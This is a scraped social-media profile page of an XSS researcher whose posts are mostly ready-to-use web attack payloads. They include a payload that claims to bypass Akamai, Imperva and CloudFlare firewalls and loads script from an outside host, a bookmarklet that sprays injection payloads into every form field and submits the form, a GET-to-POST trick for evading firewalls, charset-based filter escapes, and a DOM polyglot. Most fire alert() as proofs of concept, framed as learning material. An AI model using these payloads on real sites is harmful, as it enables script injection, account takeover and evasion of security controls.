Brute Logic
@BRuteLogic
Followers
63K
Following
8K
Media
788
Statuses
13K
#CyberSecurity | #XSS #SQLi #SSRF | #WAF #bypass | #hack2learn | @RodoAssis | @KN0X55 | https://t.co/SIanVGfIHN | https://t.co/GyZaXU7FX9
Brazil 🇧🇷
Joined October 2009
One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. #hack2learn @KN0X55
21
164
740
FormSpray1 Bookmarklet. JavaScript:f=document.forms[0];i=f.elements;Array.from(i).forEach(e=>{if(e.type==='text')e.value+='"AutoFocus/OnFocus=alert(1)//';if(e.type==='hidden')e.value+='"Style=Content-Visibility:Auto OnContentVisibilityAutoStateChange=alert(1)//'});f.submit();k.
1
2
22
RT @KN0X55: 🏆 KNOXSS September 2025 Giveaway 🏆. ➡️ Follow, like and share! 😍. ➡️ 1 Month Pro access for 3 winners on Friday 5th. Good luck!….
0
58
0
RT @KN0X55: #XSS tricks to #Bypass #WAF in the URL Context.by @BRuteLogic. => HTMLi + Double Encoding + Embedded Bytes. JavaScript:"<Svg/On….
0
46
0
Super Simple Script GET 2 POST . WAFs usually got bypassed easier via POST so if you can change from GET to POST you increase your chances. Copy and save the code below as your bookmark. #bookmarklet
JavaScript:l=location,p=new URLSearchParams(;i='';p.forEach((v,n)=>{i+='<Input Name="'+n+'" Value="'+v+'"><br><br>'});document.write(('Data:Text/Html,<Form Action="'+l.origin+l.pathname+'" Method=Post>'+i+'<Input Type=Submit></Form>').replace(/</g,'<')).
1
18
131
JavaScript:l=location,p=new URLSearchParams(;i='';p.forEach((v,n)=>{i+='<Input Name="'+n+'" Value="'+v+'"><br><br>'});document.write(('Data:Text/Html,<Form Action="'+l.origin+l.pathname+'" Method=Post>'+i+'<Input Type=Submit></Form>').replace(/</g,'<')).
0
8
56
RT @Le_Unsung_Hero: I had a URL which I know it's 100% vulnerable to XSS but the WAF is always in it's way to block my payloads. Tried @KN0….
0
2
0
RT @KN0X55: 🏆 KNOXSS August 2025 Giveaway 🏆. ➡️ Follow, like and share! 😍. ➡️ 1 Month Pro access for 3 winners on Friday 8th. Good luck! 🤞….
0
75
0
RT @BRuteLogic: Help us tailor the content we share here. Is it easy for you to exploit a clear XSS vulnerability?. ( like the ones here =>….
0
1
0
Feel free to use it. if ( origin.indexOf ('domain.tld') !== -1 ) { alert(1) }.
0
1
39
Help us tailor the content we share here. Is it easy for you to exploit a clear XSS vulnerability?. ( like the ones here => ). Thank you in advance.
1
1
4
JSi - Escape the Escape.Chinese and Japanese Charsets. GBK, GBK2312, GBK19030.%81'/alert(1)//. ISO-2022-JP.%1B%28%4A'/alert(1)//. For when a filter does that:. '-alert(1)-' ➡️ \'-alert(1)-\' .\'-alert(1)// ➡️ \\\'-alert(1)//. #XSS #bypass #hack2learn.
web.archive.org
So here are the 7 cases everyone should know to be able to PoC the vast majority of XSS flaws out there. A web page to show them
2
23
94
RT @BRuteLogic: Practice your #XSS muscles.
x55.is
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
0
14
0
Practice your #XSS muscles.
x55.is
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
0
14
68
RT @BRuteLogic: A DOM-Based #XSS Polyglot. 1;/*'"><Img/Src/OnError=/**/confirm(1)//>. If your input happens to end up in the DOM via innerH….
0
35
0
A DOM-Based #XSS Polyglot. 1;/*'"><Img/Src/OnError=/**/confirm(1)//>. If your input happens to end up in the DOM via innerHTML or eval(), it works for both cases. PoCs below. innerHTML: eval():
0
35
153
